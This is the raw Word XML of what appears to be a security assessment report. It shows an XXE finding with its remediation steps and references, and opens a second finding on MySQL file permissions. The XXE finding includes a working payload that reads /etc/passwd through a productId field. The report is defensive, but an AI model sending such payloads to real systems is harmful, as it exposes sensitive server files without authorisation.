    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2A8C2263" w14:textId="19791382">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943430A" w:rsidP="0D325B6E" w:rsidRDefault="3943430A" w14:paraId="0DB15BFE" w14:textId="59ED789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Step 2: Inject an XML external entity that can be used to read any file on the system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3943430A" w:rsidP="0D325B6E" w:rsidRDefault="3943430A" w14:paraId="6E71254B" w14:textId="0C25750B">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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3943430A" w:rsidP="0D325B6E" w:rsidRDefault="3943430A" w14:paraId="486C511B" w14:textId="55F95609">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>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 xml:space="preserve">&lt;!DOCTYPE foo [ &lt;!ENTITY </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xxe</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 xml:space="preserve"> SYSTEM "</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file:///</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etc</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/passwd</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 ]</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3943430A" w:rsidP="0D325B6E" w:rsidRDefault="3943430A" w14:paraId="3CFB025D" w14:textId="33F1C82A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
      </w:pP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stockCheck</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productId</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&gt;&amp;</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xxe</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productId</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&gt;&lt;/</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stockCheck</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3943430A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="78C5FDA5" w14:textId="25E86AA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07E7360" w:rsidP="0D325B6E" w:rsidRDefault="307E7360" w14:paraId="5FD737A9" w14:textId="1915CE7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7E736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07E7360" w:rsidP="0D325B6E" w:rsidRDefault="307E7360" w14:paraId="7AAE9790" w14:textId="74804BB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7E736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07E736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 xml:space="preserve"> the </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1C3EED93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="35E5B5C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="29C2EBF1" w:rsidP="0D325B6E" w:rsidRDefault="29C2EBF1" w14:paraId="141A20C4" w14:textId="6C3B3714">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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C2EBF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disable external entities in XML parsers, preventing attack</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0732BFE4">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565A6139">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from occuring</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="75A3A37B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="629D1F22" w:rsidP="0D325B6E" w:rsidRDefault="629D1F22" w14:paraId="5A830026" w14:textId="1610AC78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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29D1F22">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29C2EBF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">erform input validation, specifically </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="29C2EBF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disallowing !DOCTYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="29C2EBF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> declarations</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0A56AE24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="29C2EBF1" w:rsidP="0D325B6E" w:rsidRDefault="29C2EBF1" w14:paraId="2372CE36" w14:textId="514ABBED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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C2EBF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use safe parsing libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="57A17D9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> built into all common web frameworks</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4D4BEF6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CA811F0" w:rsidP="0D325B6E" w:rsidRDefault="4CA811F0" w14:paraId="5B95086E" w14:textId="1B9A73A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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CA811F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Install a web application </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4CA811F0">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4CA811F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E7CB578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(WAF) </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4CA811F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to block dangerous XML requests</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="67C18D52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55F88CCC" w:rsidP="0D325B6E" w:rsidRDefault="55F88CCC" w14:paraId="46841D65" w14:textId="32460BED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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F88CCC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sandbox the application and restrict its permissions to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="551E896F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">limit the impact of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="55F88CCC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>remote command execution on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0A1026A7" w14:textId="318DFD5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>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66B8A858" w:rsidP="0D325B6E" w:rsidRDefault="66B8A858" w14:paraId="7AC389AD" w14:textId="3A8FB29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6B8A858">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671DFB85" w:rsidP="0D325B6E" w:rsidRDefault="671DFB85" w14:paraId="12801E61" w14:textId="40B842A5">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818b21f86bd140d7">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="671DFB85">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - XXE Explained</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="01807088" w:rsidP="0D325B6E" w:rsidRDefault="01807088" w14:paraId="4F51C58A" w14:textId="0B096797">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rad7f24071d844198">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="01807088">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - XXE Prevention Cheats</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="7494AD84">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="01807088">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>eet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01807088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2FA05309">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79A7989F" w:rsidP="0D325B6E" w:rsidRDefault="79A7989F" w14:paraId="083B5E90" w14:textId="038D8E72">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R3aa9154924224880">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="79A7989F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Palo Alto Networks: How to Deploy Web Application Firewalls</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1E379CD9" w14:textId="5E8CCC81">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B8936BF" w:rsidP="0D325B6E" w:rsidRDefault="1B8936BF" w14:paraId="6709F5D8" w14:textId="6C06FE27">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B8936BF">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B8936BF">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B8936BF">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> File Permission Enabled on </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="59EA21CE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B8936BF">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A28CCAD">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B8936BF">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server</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09E8044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C5018B" w14:textId="1F45F7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433910" w14:textId="6D440D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B7431E" w14:textId="6A0AC6F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7262816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7838B7" w14:textId="5D5090B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6648C3D" w14:textId="4F85F045">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6FDADA9" w14:textId="0B79ECE0">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04829DAB">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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B33C8F9" w14:textId="67366921">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6F343A0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CE68CB3" w14:textId="20278D5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EFF4F0D" w14:textId="70CCF7AC">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B443632"/>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2A204B4"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="48B8C15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68BB5B" w14:textId="67940CD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F06227A" w:rsidP="0D325B6E" w:rsidRDefault="5F06227A" w14:paraId="2734CBA1" w14:textId="6CD45E9D">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R6b81cbdf922b4787">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5F06227A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4C8009A3">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B1C5C8" w14:textId="387F5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1CEFF0" w14:textId="4F24597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CC132F8" w14:textId="1BEAC21D">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rda2925d82eb1438e">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T11</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>90</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0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Exploit Public-Facing Application</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1703ECF2" w14:textId="716B41E4">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R2a86aee9eb97426d">
